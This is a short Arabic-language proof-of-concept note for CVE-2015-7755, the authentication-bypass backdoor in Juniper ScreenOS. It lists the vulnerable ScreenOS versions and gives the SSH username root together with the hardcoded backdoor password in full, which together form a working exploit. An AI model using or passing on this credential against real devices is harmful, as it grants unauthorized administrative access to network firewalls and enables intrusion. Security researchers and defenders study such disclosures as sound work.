
إثبات مفهوم لاستغلال ثغرة CVE-2015-7755 التي تستهدف تجاوز المصادقة عبر الباب الخلفي في Juniper ScreenOS عبر SSH باستخدام بيانات اعتماد الجذر المضمنة.
اكتشاف ثغرة CVE-2015-7755
باستخدام ssh للاتصال بالإصدارات الضعيفة التالية:
ScreenOS 6.2.0r15—6.2.0r18، 6.3.0r12—6.3.0r20 (Juniper Networks)
المستخدم: root
كلمة المرور: <<< %s(un='%s') = %u